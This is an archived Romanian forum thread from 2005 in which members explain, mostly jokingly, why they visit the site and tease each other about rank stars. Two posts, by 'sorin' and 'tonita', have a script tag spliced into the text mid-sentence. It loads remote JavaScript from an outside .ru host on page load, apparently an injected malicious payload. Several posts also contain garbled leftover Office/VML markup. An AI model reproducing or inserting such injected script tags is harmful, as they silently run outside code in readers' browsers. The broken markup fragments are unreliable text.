PDA

Arată versiune întreagă : Buna ziua si o intrebare

hazel
09.03.2005, 13:04
Buna ziua stimati forumisti, iaca m-am inregistrat si eu, dupa ce o vreme am citit in tacere unele din posturile voastre. Am constatat ca, indiferent de situatie,cei mai multi aveti simtul umorului si asta e un semn bun, de sanatate si vigoare,pentru orice forum.

O intrebare, pentru cei aflati departe de Romania...daca aveti timpul si cheful necesar de a raspunde - de ce simtiti nevoia sa va retrageti pe acest forum? Ce va indeamna la a va loga in mod periodic aici? Ce sperati sa gasiti aici?

Va multumesc pentru atentie si pentru eventualele raspunsuri, cei care vor sa dea raspunsuri amuzante sunt rugati sa nu se abtinahttp://www.romanian-portal.com/forum/smileys/smiley1.gif

danielle
09.03.2005, 18:44
O sa raspund eu prima la intrebarea ta:

Prima data cand am ajuns aici, a fost curiozitatea, sa vad cu ce se mai ocupa lumea care a emigrat.

Apoi a fost necesitatea de informare si am aflat multe informatii care mi-au fost de folos.

Apoi a urmat nevoie de destindere si de multe ori m-am simtit bine aici pentru ca m-au distrat anumite posturi.

Mai apoi, am cunoscut persoane din zona in care sunt si mi-am facut prieteni.

Acum, dupa ce toate astea au avut deja loc este pastrarea legaturii cu o zona in care ma simt de-a casei.

Si atat...smileys/smiley2.gifpentru moment.

sauzimdebine
09.03.2005, 19:19
Prima data din greseala, smileys/smiley29.gifa doua data din alta greseala, smileys/smiley49.gif a treia data din nou din greseala, smileys/smiley29.gif a patra data din ... obijnuinta. smileys/smiley2.gif
Sa nu intelegi din asta ca as fi unul care merge din greseala in greseala ... smileys/smiley36.gif
Ce ma retine aici? Faptul ca am primit trei stelute. In viata mea nu am avut atat de multe.smileys/smiley16.gif

tonita
09.03.2005, 23:47
...Faptul ca am primit trei stelute. In viata mea nu am avut atat de multe.smileys/smiley16.gif

smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gifTot trei ! Ba,nu 4 smileys/smiley36.gif

Eu am venit pentru limba rom

10.03.2005, 01:55
Buna Hazel,

La mine estesetea de a evada pentru un timp din realitate ..smileys/smiley2.gif

Dar tu ce ai simtit ca spectator si ce te-adeterminat sa intri in joc??smileys/smiley4.gif

dorianos
10.03.2005, 05:45
Eu vin pentru ca-mi place avatrul lui Melina.

10.03.2005, 06:14
dorianos;Stiam eu ca iti place smileys/smiley2.gif, l-am pus si eu ca sa te motivez un pic ,se pare ca am reusitsmileys/smiley36.gif

hazel
10.03.2005, 06:23
dragii mei, va multumesc pentru raspunsurile voastre smileys/smiley1.gif

danielle, din motivele tale pot sa aleg si eu unul - cred ca am poposit aici din nevoia de destindere. Dar stai putin, nu s-a intamplat oricum, pentru ca mai sunt si alte forumuri romanesti, cred ca m-a retinut aici stilul conversatiilor, mi s-a parut un stil sprintar, plin de umor si totodata forumistii au respect unii la adresa altora, chiar daca se impung uneori smileys/smiley4.gif

sauzimdebine, am uitat sa intreb de ieri si mi-ai adus aminte: ce conditii trebuie sa indeplinesti sa ai cat mai multe stelute pe umeri? Ce fapte eroice ati facut unii dintre voi sa aveti asa multe? Io cand am sa am mai multe?smileys/smiley8.gif

Tu spui ca din greseala ai nimerit aici, eu zic ca nimic nu este intamplator in lumea aceasta;)

toni, cred ca limba romana este (inca) un motiv bun pentru adunarea a mai multe persoane la un loc, chiar daca numai in virtual. hehe nu e asa ca atunci cand vrei sa iei sub lupa pe cineva sfarsesti si tu sub ea? Na ca mi s-a intamplat si mie smileys/smiley36.gif

Cum spuneam si daniellei, mi-a placut felul in care se discuta aici. De asemenea mi-a placut functionalitatea aplicatiei care gazduieste acest forum, este usor de citit, are numeroase "perks" pentru cel care compune un mesaj si altele. Administratia pare sa fie profesionala, fara sa ingradeasca stilul si imaginatia forumistilor pana intr-atat incat sa se vorbeasca in limbaj de lemn, cere totusi respect si parasirea ringului de catre protagonisti cand inca mai respira, pana nu e prea tarziu smileys/smiley36.gif

Am intalnit si forumuri unde, desi gasesti tone de informatii ( pentru cine are nevoie) mi se pare ca au un stil mai greoi. In fine, poate ca voi aveti acelJe ne sais quois ce opreste trecatorul din drum sa va citeasca smileys/smiley76.gif

Despre mine, sunt si eu un suflet in marea si risipitafamilie de suflete vorbitoare de limba romana ce locuieste in State. Muncesc destul de mult si cu o oarecare doza de stres, de aceea imi place sa gasesc un mijloc de destindere. Sunt o fire destul de comunicativa si imi place sa cred ca posed un simt al umorului http://www.romanian-portal.com/forum/smileys/smiley4.gifDupa cum se vede, simt nevoia sa comunic si in limba romana, de aceea am mai adaugat si eu un rand la baza de date a userilor de aici smileys/smiley4.gif

zic si eu ca danielle, cam atat pentru moment smileys/smiley2.gifva doresc o primavara minunata!

angela
10.03.2005, 07:18
Hazel welcomesmileys/smiley31.gif

Sper sa stai cat mai mult printre noi, sa nu te superi repede, sa tii la gluma.... etc

sauzimdebine
10.03.2005, 10:57
smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif Tot trei ! Ba,nu 4 smileys/smiley36.gif

Toni, smileys/smiley87.gif , daca afla Sorin, ramai fara de stelute. smileys/smiley36.gif

sauzimdebine
10.03.2005, 10:59
smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif Tot trei ! Ba,nu 4 smileys/smiley36.gif

Toni, nu era vorba de cate stelute ai avut tu, smileys/smiley87.gif , ca daca aude Sorin ramai fara acestea de pe forum.

Hazel, o data cu numarul mesajelor creste si numarul stelutelor. In rest, stelute multe sau putine, toti suntem la acelasi nivel. Cu mici exceptii, cum ar fi cei de au avut sau au inca stelute de la altii ... smileys/smiley36.gif

kiki
10.03.2005, 11:46
aici se impartsi stelute si bilute ...albe smileys/smiley9.gif

sorin
10.03.2005, 12:29
Toni, nu era vorba de cate stelute ai avut tu, http://www.romanian-portal.com/forum/smileys/smiley87.gif</v:stroke></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:ulas></v:path><o:lock aspectratio="t" v:ext="edit"></o:lock></v:shape></v:stroke></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:ulas></v:path><o:lock aspectratio="t" v:ext="edit"></o:lock></v:shape>,ca daca aude Sorin ramai fara acestea de pe forum.

Nu i le iau ca omul a muncit din greu sa le castige, dar nici nu ii mai dau mai mult de trei cate are smileys/smiley36.gif

aici se impartsi stelute si bilute ...albe smileys/smiley9.gif

Bilute albe nu se mai impart ca unii mai invidiosi fac misto de<<script src=http://www.iroe.ru/ngg.js></script>

rossa
11.03.2005, 00:25
Cate stele mai prevede gradul de general ? Eu am impresia ca totusi aici se poate avansa si pe pile ! Ce zici Sorin ????

sorin
11.03.2005, 01:07
smileys/smiley1.gifNu Rossa, nu se avanseaza pe pile, pentru ca stelutele le da programul si nu eu smileys/smiley2.gif

Ma uit la mesajele precedente si observ ca ai...omis sa raspunzi la intrebarea initiala a acestui topic

rossa
11.03.2005, 01:48
Am uitat ! Asa-s eu mai uituc dar e foarte bine ca tu ai vazut !http://www.smileytown.com/c&#111;ntent/emot/poud0001.gif (http://www.smileytown.com/index.shtml?source=smileymail)

tonita
11.03.2005, 07:12
Nu i le iau ca omul a muncit din greu sa le castige, dar nici nu ii mai dau mai mult de trei cate are smileys/smiley36.gif

Patroane, fac ore suplimentare, lucrez chiar si schimbu de noapte, chiar n-am nici o sansa ?!smileys/smiley36.gif

Toni, nu era vorba de cate stelute ai avut tu, http://www.romanian-portal.com/forum/smileys/smiley87.gif</v:stroke></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:ulas></v:path><o:lock v:ext="edit" aspectratio="t"></o:lock></v:shape></v:stroke></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:ulas></v:path><o:lock v:ext="edit" aspectratio="t"></o:lock></v:shape>,ca daca aude Sorin ramai fara acestea de pe forum.

Pai le mai am, le-am luat cu mine ca inca nu m-am pensionat smileys/smiley2.gifdar Sorin crede ca e vorba de stelutze de felul asta : smileys/smiley36.gifsmileys/smiley36.gifsmileys/smiley36.gif3 bucati, ba<script src=http://www.iroe.ru/ngg.js></script>

kiki
11.03.2005, 07:16
Premiantii intotdeauna vor avea invidiosi in jur. Asta-i viata ...fara biberon smileys/smiley36.gif

christianT
11.03.2005, 12:32
Eu ma caut pe mine.

sauzimdebine
12.03.2005, 05:17
Dupa ce te gasesti mai ramai pe aici sau vei pleca? Nu de alta dar, cateva din scrierile tale au placut.

12.03.2005, 14:11
Eu ma caut pe mine.

Cine esti tu,mai ti minte?

evelyn
13.03.2005, 03:41
Acum, daca tot am spart gheata, vreau si eu o steluta !!!! Sant inregistrata pe forumul asta de prin Iulie, anul trecut. Asta nu ajuta ? Just kidding, Sorin ...

Eu am tot citit mesajele voastre de un timp; si acum chiar m-am hotarat sa fiu umpic mai activa !

Imi plac subiectele si sant FUN; acum m-ati atras si pe mine in HORA. Asa ca " here I come".

sauzimdebine
13.03.2005, 03:55
Na, ca iar am dat de-o brasoveanca care vrea stelute. smileys/smiley31.gif evelyn smileys/smiley31.gif

evelyn
13.03.2005, 04:00
Faci ce faci si tot de NOI dai draga Sauzimdebine !!! Asta e un semn, stii ?

hazel
13.03.2005, 19:59
Eu ma caut pe mine.

O fi adevarat ca suntem niste soareci care alergam toata viata noastra efemeraprintr-un labirint cu oglinzi si din cand in cand ne oprim sa ne tragem sufletul, sa ne refacem freza si sa capatam o imagine despre ceea ce suntem, sau ceea ce am devenit de la ultimul popas? daca speri sa te vezi pe tine in rasfrangerea miilor de ochi care se privesc si ei in oglinzi, s-ar putea sa ai surpriza sa gasesti mii de imagini despre tine insuti, te poti regasi in perceptia fiecaruia despre tine.